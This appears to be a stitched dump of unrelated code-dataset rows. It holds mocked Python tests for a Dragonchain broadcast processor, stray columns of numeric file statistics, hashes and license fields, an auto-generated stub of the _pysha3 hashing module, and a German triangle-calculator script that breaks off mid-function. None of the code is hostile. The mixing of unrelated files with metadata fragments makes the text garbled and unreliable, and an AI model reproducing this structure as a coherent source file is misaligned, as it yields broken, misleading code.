@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 0)],
)
async def test_process_blocks_fires_requests_and_reschedules_for_new_block(
self,
mock_get_blocks,
mock_gather,
mock_get_block_level,
mock_chain_id_set,
mock_get_futures,
mock_schedule_broadcast,
mock_get_verifications,
mock_time,
mock_claim,
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_get_futures.assert_called_once_with(None, "block_id", 2, {"chain_id"})
mock_schedule_broadcast.assert_awaited_once_with("block_id", 123 + broadcast_processor.BROADCAST_RECEIPT_WAIT_TIME)
mock_gather.assert_called_once_with(return_exceptions=True)
mock_get_verifications.assert_not_called()
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check")
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures", return_value=None)
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 0)],
)
async def test_process_blocks_doesnt_reschedule_new_block_which_failed_had_no_futures(
self, mock_get_blocks, mock_gather, mock_get_block_level, mock_chain_id_set, mock_get_futures, mock_schedule_broadcast, mock_claim
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_get_futures.assert_called_once()
mock_schedule_broadcast.assert_not_called()
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check")
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.set_current_block_level_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.needed_verifications", return_value=0)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_receieved_verifications_for_block_and_level_async",
return_value={"verification"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures")
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 1)],
)
async def test_process_blocks_promotes_block_with_enough_verifications(
self,
mock_get_blocks,
mock_gather,
mock_get_block_level,
mock_chain_id_set,
mock_get_futures,
mock_schedule_broadcast,
mock_get_verifications,
mock_needed_verifications,
mock_set_block_level,
mock_claim_check,
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_set_block_level.assert_awaited_once_with("block_id", 3)
mock_schedule_broadcast.assert_awaited_once_with("block_id")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check")
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.remove_block_from_broadcast_system_async",
return_value=asyncio.Future(),
)
@patch("dragonchain.broadcast_processor.broadcast_processor.needed_verifications", return_value=0)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_receieved_verifications_for_block_and_level_async",
return_value={"verification"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures")
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=5)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 1)],
)
async def test_process_blocks_removes_l5_block_with_enough_verifications(
self,
mock_get_blocks,
mock_gather,
mock_get_block_level,
mock_chain_id_set,
mock_get_futures,
mock_get_verifications,
mock_needed_verifications,
mock_remove_block,
mock_claim_check,
):
mock_gather.return_value.set_result(None)
mock_remove_block.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_remove_block.assert_called_once_with("block_id")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.overwrite_no_response_node")
@patch("dragonchain.broadcast_processor.broadcast_processor.needed_verifications", return_value=3)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_receieved_verifications_for_block_and_level_async",
return_value={"verification"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures")
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 1)],
)
async def test_process_blocks_updates_matchmaking_claim_for_new_chain_verification(
self,
mock_get_blocks,
mock_gather,
mock_get_block_level,
mock_chain_id_set,
mock_get_futures,
mock_schedule_broadcast,
mock_get_verifications,
mock_needed_verifications,
mock_no_response_node,
mock_claim_check,
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_no_response_node.assert_called_once_with("block_id", 2, "chain_id")
@patch(
"dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check",
return_value={"metadata": {"dcId": "banana-dc-id"}},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.overwrite_no_response_node", return_value={"verification"})
@patch("dragonchain.broadcast_processor.broadcast_processor.time.time", return_value=123)
@patch("dragonchain.broadcast_processor.broadcast_processor.needed_verifications", return_value=3)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_receieved_verifications_for_block_and_level_async",
return_value={"verification"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures")
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 1)],
)
async def test_process_blocks_makes_broadcast_and_reschedules_block_when_sending_new_requests(
self,
mock_get_blocks,
mock_gather,
mock_get_block_level,
mock_chain_id_set,
mock_get_futures,
mock_schedule_broadcast,
mock_get_verifications,
mock_needed_verifications,
mock_time,
mock_no_response_node,
mock_claim_check,
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_get_futures.assert_called_once_with(None, "block_id", 2, {"chain_id"})
mock_schedule_broadcast.assert_awaited_once_with("block_id", 123 + broadcast_processor.BROADCAST_RECEIPT_WAIT_TIME)
mock_gather.assert_called_once_with(return_exceptions=True)
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.overwrite_no_response_node", return_value={"verification"})
@patch("dragonchain.broadcast_processor.broadcast_processor.needed_verifications", return_value=3)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_receieved_verifications_for_block_and_level_async",
return_value={"verification"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures", return_value=None)
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 1)],
)
async def test_process_blocks_doesnt_reschedule_existing_block_which_failed_had_no_futures(
self,
mock_get_blocks,
mock_gather,
mock_get_block_level,
mock_chain_id_set,
mock_get_futures,
mock_schedule_broadcast,
mock_get_verifications,
mock_needed_verifications,
mock_no_response_node,
mock_claim_check,
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_get_futures.assert_called_once()
mock_schedule_broadcast.assert_not_called()
@patch(
"dragonchain.broadcast_processor.broadcast_functions.get_notification_verifications_for_broadcast_async",
return_value={"BLOCK/banana-l2-whatever"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.sign", return_value="my-signature")
@patch("dragonchain.broadcast_processor.broadcast_processor.storage.get", return_value=b"location-object-bytes")
@patch("dragonchain.broadcast_processor.broadcast_processor.keys.get_public_id", return_value="my-public-id")
@patch("dragonchain.broadcast_processor.broadcast_functions.redis.srem_async", return_value="OK")
async def test_process_verification_notification_calls_configured_url(
self, srem_mock, public_id_mock, storage_get_mock, sign_mock, get_location_mock
):
broadcast_processor.VERIFICATION_NOTIFICATION = {"all": ["url1"]}
fake_session = AsyncMock(post=AsyncMock())
await broadcast_processor.process_verification_notifications(fake_session)
fake_session.post.assert_awaited_once_with(
data=b"location-object-bytes",
headers={"Content-Type": "application/json", "dragonchainId": "my-public-id", "signature": "my-signature"},
timeout=30,
url="url1",
)
srem_mock.assert_awaited_once_with("broadcast:notifications", "BLOCK/banana-l2-whatever")
@patch(
"dragonchain.broadcast_processor.broadcast_functions.get_notification_verifications_for_broadcast_async",
return_value={"BLOCK/banana-l2-whatever"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.sign", return_value="my-signature")
@patch("dragonchain.broadcast_processor.broadcast_processor.storage.get", return_value=b"location-object-bytes")
@patch("dragonchain.broadcast_processor.broadcast_processor.keys.get_public_id", return_value="my-public-id")
@patch("dragonchain.broadcast_processor.broadcast_functions.redis.srem_async", return_value="OK")
async def test_process_verification_notification_removes_from_set_when_fail(
self, srem_mock, public_id_mock, storage_get_mock, sign_mock, get_location_mock
):
broadcast_processor.VERIFICATION_NOTIFICATION = {"all": ["url1"]}
fake_session = AsyncMock(post=AsyncMock(side_effect=Exception("boom")))
await broadcast_processor.process_verification_notifications(fake_session)
fake_session.post.assert_called_once_with(
data=b"location-object-bytes",
headers={"Content-Type": "application/json", "dragonchainId": "my-public-id", "signature": "my-signature"},
timeout=30,
url="url1",
)
srem_mock.assert_awaited_once_with("broadcast:notifications", "BLOCK/banana-l2-whatever")
| 59.722222
| 147
| 0.776262
| 3,407
| 29,025
| 6.158791
| 0.088641
| 0.235905
| 0.19816
| 0.204642
| 0.847972
| 0.834962
| 0.804079
| 0.782205
| 0.774484
| 0.75504
| 0
| 0.007105
| 0.132024
| 29,025
| 485
| 148
| 59.845361
| 0.825785
| 0.038381
| 0
| 0.650575
| 0
| 0
| 0.411065
| 0.365423
| 0
| 0
| 0
| 0
| 0.128736
| 1
| 0.043678
| false
| 0
| 0.018391
| 0
| 0.064368
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3bd156150c8368a9a7850e6bb5b56aa237a4a6c2
| 17,158
|
py
|
Python
|
_pysha3.py
|
ReardenMetals/keygen-core
|
6ddd83b5646d2fd31c0b77a96ff01be3d213e50a
|
[
"MIT"
] | 1
|
2021-08-12T15:35:10.000Z
|
2021-08-12T15:35:10.000Z
|
_pysha3.py
|
ReardenMetals/keygen-core
|
6ddd83b5646d2fd31c0b77a96ff01be3d213e50a
|
[
"MIT"
] | null | null | null |
_pysha3.py
|
ReardenMetals/keygen-core
|
6ddd83b5646d2fd31c0b77a96ff01be3d213e50a
|
[
"MIT"
] | 2
|
2021-08-12T15:35:11.000Z
|
2022-02-01T19:14:01.000Z
|
# encoding: utf-8
# module _pysha3
# from /Users/bodayalfaro/Developer/Projects/ReardenMetals/KeyGen/csc-manager/venv/lib/python3.8/site-packages/_pysha3.cpython-38-darwin.so
# by generator 1.147
# no doc
# no imports
# Variables with simple values
implementation = 'generic 64-bit optimized implementation (lane complementing, all rounds unrolled)'
keccakopt = 64
# no functions
# classes
class keccak_224(object):
"""
keccak_224([string]) -> Keccak object
Return a new Keccak hash object with a hashbit length of 28 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class keccak_256(object):
"""
keccak_256([string]) -> Keccak object
Return a new Keccak hash object with a hashbit length of 32 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class keccak_384(object):
"""
keccak_384([string]) -> Keccak object
Return a new Keccak hash object with a hashbit length of 48 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class keccak_512(object):
"""
keccak_512([string]) -> Keccak object
Return a new Keccak hash object with a hashbit length of 64 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class sha3_224(object):
""" Return a new SHA3 hash object with a hashbit length of 28 bytes. """
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class sha3_256(object):
"""
sha3_256([string]) -> SHA3 object
Return a new SHA3 hash object with a hashbit length of 32 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class sha3_384(object):
"""
sha3_384([string]) -> SHA3 object
Return a new SHA3 hash object with a hashbit length of 48 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class sha3_512(object):
"""
sha3_512([string]) -> SHA3 object
Return a new SHA3 hash object with a hashbit length of 64 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class shake_128(object):
"""
shake_128([string]) -> SHAKE object
Return a new SHAKE hash object.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class shake_256(object):
    """
    shake_256([string]) -> SHAKE object
    Return a new SHAKE hash object.
    """
    # Generated IDE skeleton for the shake_256 type of the _pysha3 C
    # extension; every method body is a stub that only documents the API.
    def copy(self, *args, **kwargs): # real signature unknown
        """ Return a copy of the hash object. """
        pass
    def digest(self, *args, **kwargs): # real signature unknown
        """ Return the digest value as a string of binary data. """
        pass
    def hexdigest(self, *args, **kwargs): # real signature unknown
        """ Return the digest value as a string of hexadecimal digits. """
        pass
    def update(self, *args, **kwargs): # real signature unknown
        """ Update this hash object's state with the provided string. """
        pass
    def __init__(self, string=None): # real signature unknown; restored from __doc__
        pass
    @staticmethod # known case of __new__
    def __new__(*args, **kwargs): # real signature unknown
        """ Create and return a new object. See help(type) for accurate signature. """
        pass
    # Data descriptors restored without their real getters; placeholder defaults only.
    block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    _capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    _rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    _suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
# variables with complex values
__loader__ = None # (!) real value is '<_frozen_importlib_external.ExtensionFileLoader object at 0x7fea6112fd30>'
__spec__ = None # (!) real value is "ModuleSpec(name='_pysha3', loader=<_frozen_importlib_external.ExtensionFileLoader object at 0x7fea6112fd30>, origin='/Users/bodayalfaro/PycharmProjects/crypto-keygen-new/venv/lib/python3.8/site-packages/_pysha3.cpython-38-darwin.so')"
| 37.381264
| 271
| 0.651533
| 2,221
| 17,158
| 4.914903
| 0.058532
| 0.164896
| 0.10993
| 0.131916
| 0.947966
| 0.947966
| 0.945218
| 0.933492
| 0.933492
| 0.933492
| 0
| 0.009492
| 0.238664
| 17,158
| 458
| 272
| 37.462882
| 0.82615
| 0.387516
| 0
| 0.926471
| 0
| 0
| 0.008221
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.294118
| false
| 0.294118
| 0
| 0
| 0.637255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
3bd685a14662dcd2bc456a4232ac5e9a07daab6c
| 24,985
|
py
|
Python
|
dreieck-rechner.py
|
FoxtrotSierra6829/dreieck-rechner
|
e091648ed20bf8f664f8d29c2fe156ad0f16c780
|
[
"MIT"
] | null | null | null |
dreieck-rechner.py
|
FoxtrotSierra6829/dreieck-rechner
|
e091648ed20bf8f664f8d29c2fe156ad0f16c780
|
[
"MIT"
] | null | null | null |
dreieck-rechner.py
|
FoxtrotSierra6829/dreieck-rechner
|
e091648ed20bf8f664f8d29c2fe156ad0f16c780
|
[
"MIT"
] | null | null | null |
# Copyright (c), 2021, Florian Scheuner
"""Interactive triangle solver ("Dreieck-Rechner").

Reads any combination of the sides a, b, c and the angles α, β, γ (in
degrees; empty or invalid input counts as "unknown") and completes the
triangle using the 180° angle sum, the law of sines and the law of cosines.
Every quantity that was not entered is printed, followed by the area A.
In the ambiguous SSA case both possible triangles are printed.

Fixes over the original branch-per-case version: the "bcalphabeta" and
"acalphabeta" cases computed the third angle as 180-α-γ instead of 180-α-β;
several branches mixed radians and degrees (double m.degrees() conversion,
m.sin() applied to a value already in degrees); impossible SSA inputs made
m.asin() raise instead of reporting an error.
"""
import math as m

# Maps each side to the name of its opposite angle (law-of-sines pairs).
_OPPOSITE = {"a": "alpha", "b": "beta", "c": "gamma"}
# Greek output labels, matching the input prompts.
_GREEK = {"alpha": "α", "beta": "β", "gamma": "γ"}


def _read_float(prompt):
    """Prompt for one number; invalid or empty input counts as 0 (= unknown)."""
    try:
        return float(input(prompt))
    except ValueError:
        return 0.0


def solve_triangle(sides, angles, use_obtuse=False):
    """Complete a partially specified triangle.

    ``sides``/``angles`` map the names "a"/"b"/"c" and "alpha"/"beta"/"gamma"
    to values; 0 means unknown and angles are in degrees.  ``use_obtuse``
    selects the obtuse variant in the ambiguous SSA case.  Returns a tuple
    ``(sides, angles, area)`` with every value filled in, or ``None`` when
    the data is insufficient or geometrically impossible.  The input dicts
    are not modified.
    """
    sides = dict(sides)
    angles = dict(angles)
    if any(v >= 180.0 for v in angles.values()):
        return None  # a single interior angle must stay below 180°
    # Propagate known values until the triangle is complete; two passes
    # always suffice, the remaining iterations are a safety margin.
    for _ in range(4):
        # 180° angle sum: two known angles determine the third.
        known = [k for k, v in angles.items() if v > 0]
        if len(known) == 2:
            rest = 180.0 - angles[known[0]] - angles[known[1]]
            if rest <= 0:
                return None  # the two given angles already reach 180°
            angles[(set(angles) - set(known)).pop()] = rest
        # Law of cosines (SSS): three sides give every missing angle.
        if all(v > 0 for v in sides.values()):
            for s, (x, y) in (("a", ("b", "c")), ("b", ("a", "c")),
                              ("c", ("a", "b"))):
                if angles[_OPPOSITE[s]] <= 0:
                    cos_v = ((sides[x] ** 2 + sides[y] ** 2 - sides[s] ** 2)
                             / (2 * sides[x] * sides[y]))
                    if not -1.0 <= cos_v <= 1.0:
                        return None  # triangle inequality violated
                    angles[_OPPOSITE[s]] = m.degrees(m.acos(cos_v))
        # Law of cosines (SAS): two sides and the included angle give the third side.
        for s, (x, y) in (("a", ("b", "c")), ("b", ("a", "c")),
                          ("c", ("a", "b"))):
            if (sides[s] <= 0 and sides[x] > 0 and sides[y] > 0
                    and angles[_OPPOSITE[s]] > 0):
                sides[s] = m.sqrt(
                    sides[x] ** 2 + sides[y] ** 2
                    - 2 * sides[x] * sides[y]
                    * m.cos(m.radians(angles[_OPPOSITE[s]])))
        # Law of sines, anchored on any fully known side/angle pair.
        pair = next((k for k in sides
                     if sides[k] > 0 and angles[_OPPOSITE[k]] > 0), None)
        if pair is not None:
            ratio = sides[pair] / m.sin(m.radians(angles[_OPPOSITE[pair]]))
            for k in sides:
                opp = _OPPOSITE[k]
                if sides[k] <= 0 < angles[opp]:
                    sides[k] = ratio * m.sin(m.radians(angles[opp]))
                elif (sides[k] > 0 and angles[opp] <= 0
                        and not all(v > 0 for v in sides.values())):
                    # SSA: derive the angle opposite a known side.  asin()
                    # yields the acute solution; an obtuse solution exists
                    # only when this side is longer than the anchor side.
                    sin_v = sides[k] / ratio
                    if sin_v > 1.0:
